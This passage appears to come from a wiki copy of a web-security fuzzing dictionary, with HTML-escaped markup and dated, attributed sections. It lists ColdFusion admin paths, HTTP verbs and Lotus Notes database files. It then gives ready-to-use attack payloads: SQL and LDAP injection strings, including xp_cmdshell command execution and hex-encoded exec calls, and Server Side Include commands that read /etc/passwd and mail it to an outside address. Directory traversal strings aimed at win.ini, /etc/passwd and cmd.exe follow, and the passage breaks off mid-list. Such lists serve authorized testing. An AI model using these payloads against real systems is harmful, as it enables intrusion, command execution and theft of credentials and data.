.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
